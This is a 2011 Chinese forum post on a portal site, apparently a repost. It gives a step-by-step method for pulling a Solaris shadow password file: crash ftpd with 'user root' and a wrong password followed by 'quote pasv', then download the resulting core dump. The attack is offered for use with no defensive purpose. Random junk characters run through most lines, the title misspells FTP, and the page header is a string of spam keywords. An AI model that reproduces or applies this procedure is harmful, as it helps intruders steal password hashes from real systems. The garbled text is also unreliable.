天天爱天天做天天做天天吃中文|久久综合给久合久久综合|亚洲视频一区二区三区|亚洲国产综合精品2022

    • 

    <delect id="ixd07"></delect>
      

      

      汶上信息港
      
標(biāo)題: 如何用FIP獲取shadow口令文件 [打印本頁]
      

      
作者: 雜七雜八    時(shí)間: 2011-1-12 21:01
      
標(biāo)題: 如何用FIP獲取shadow口令文件
      該方法利用了Solaris 操作系統(tǒng)中FTPD的一個(gè)BUG,使得用戶可以獲得該機(jī)的口令文件。具體過程如下:4 d. N) i$ S: u1 @8 ?
      
$ }" N9 b0 D! [6 S  B' g3 c. m
      
1.通過 ftp 正常登錄到目的主機(jī)上& b' x. F8 l3 t" \. ]
      

      
% r& @9 t9 r: m3 y2 k+ E8 A# I3 A2.輸入如下命令序列:+ c0 `# Q/ {6 u. E6 R8 u% N
      
) D  C. I0 h3 _$ G+ U8 ]
      
ftp> user root wrongpasswd: k$ o" \8 \* a8 K9 F
      

      
& N1 e4 \2 c" H; h) t* `6 _ftp> quote pasv
      
; T, B: }! h, ^7 ?/ T. n9 A6 T- k; @) U9 j
      
3.這時(shí),ftpd會(huì)報(bào)錯(cuò)退出,同時(shí)會(huì)在當(dāng)前目錄下生成一個(gè)core,口令文件就包含在這個(gè)core中。
      
& j" `3 I7 e% o+ S0 R/ |# v' n7 n3 }' T$ G* f
      
4.再次進(jìn)入FTP >get core
      
8 [% a1 t3 w5 A7 W; P5 P1 t. x
      
; `8 V' H) U" I/ j* [6 h1 h) `補(bǔ)充:雖然在core只有一部分shadow,但是對(duì)于系統(tǒng)來說已經(jīng)是致命的打擊了
      
$ P7 P3 _1 D/ {* W3 `' P
      
8 o8 T! N0 s0 E2 x




      

      

      歡迎光臨 汶上信息港 (http://www.vancelump.com/)

Powered by Discuz! X3.5